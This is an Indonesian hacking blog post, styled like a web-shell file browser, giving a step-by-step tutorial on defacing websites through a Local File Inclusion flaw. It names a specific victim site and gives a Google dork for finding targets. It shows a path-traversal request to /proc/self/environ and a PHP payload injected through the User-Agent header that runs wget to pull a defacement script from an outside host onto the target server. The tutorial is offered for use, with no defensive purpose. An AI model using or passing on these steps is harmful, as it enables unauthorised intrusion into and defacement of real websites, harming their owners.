BL4ZTERZT404
NOT FOUND!
Today : | at : | safemode : OFF| Security : Active
> / blazterzt404 / public_html / blog / post /

Dear sobat blogger blazterzt, blog blazterzt sudah aktif kembali silahkan cekout konten terbaru dari mas blazt.
name author perms com modified label

.:: Defacing - Defacing From Local File Inclusion Vulnerability (LFI) BLAZTERROR rwxr-xr-x 0 9:41 AM

Filename .:: Defacing - Defacing From Local File Inclusion Vulnerability (LFI)
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 9:41 AM
Label
Action
Kali ini post saya ingin menjelaskan tentang bagaimana deface melalui bug Local File Inclusion atau yang sering kita sebut dengan LFI.

Sebelumnya apa itu LFI ? Menurut saya :


LFI adalah suatu celah yang dimana attacker nantinya akan bisa mengakses dan mengupload file di website tersebut dengan hanya melalui url

Langsung ke pembahasan.

1. Pertama, kita cari target dulu di google dengan dork :

inurl:.php?page=contact.php

2. Pada tutorial ini web dengan url : http://www.heng-sieng.fr/heng-sieng.php?...ontact.php menjadi tikus percobaan kita.

3. Setelah membuka url tersebut. Cobalah ganti /heng-sieng.php?page=contact.php menjadi /heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
 Sehingga url berubah menjadi :

http://www.heng-sieng.fr/heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Kemudian tekan enter maka tampilan nya akan seperti ini :


Sekarang target udah ready dan siap untuk kita deface. Tapi bagaimana caranya ? Oke ikutin langkah-langkah saya berikut ini :

4. Jalankan Tamper Data di Mozilla Firefox - ( Tools => Tamper Data )

Keterangan : Buat yang belum ada silahkan di install dulu add-ons nya.


 5. Start Tamper dan reload halaman target kita, maka akan muncul tampilan seperti ini :


6. Klik Tamper maka akan muncul form berikut ini seperti pada gambar :


7. Pada Label User-Agent ganti dengan script berikut ini :


<?system(‘wget [url script deface kalian]‘);?>
Contoh :

<?system(‘wget http://snpb.polibatam.ac.id/paper/teguh.php’);?>

Seperti pada gambar :

 8. Kemudian klik Ok untuk menlanjutkan. Secara otomatis halaman target kita akan mereload dengan sendirinya.

9. Sekarang kita liat script deface kita tadi. Go to address : http://[patch]/namascriptkita.php or .html

10. Sekarang cobalah buka http://www.heng-sieng.fr/teguh.php Taraaa. Website has been deface ^_^

Keterangan :

1. <?system(‘wget http://snpb.polibatam.ac.id/paper/teguh.php’);?>


Wget : Command untuk mengambil file di server lain

http://snpb.polibatam.ac.id/paper/teguh.php : URL script deface kita

teguh.php : Nama script deface kita yang berextensi .php

Sekian dari saya dan terima kasih.
 Sumber dari : Hacker Newbie dan Teguh Micro

avatar Author : BLAZTERROR
Posting : .:: Defacing - Defacing From Local File Inclusion Vulnerability (LFI)
Time : 9:41 AM
Label :
Get The c0de and feel your soul ~ Indonesian c0ders

Baca Juga yang ini :



0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
 

BL4ZTERZT404_ © 2013 BL4ZTERZT404 Blogs All Right Reserved
Thx To B374K and p4r4ghcyb3rn3t, Template Redesign by BL4ZTERZT404 - Blogs

Find Our Facebook!
Join Indonesia Blog Community!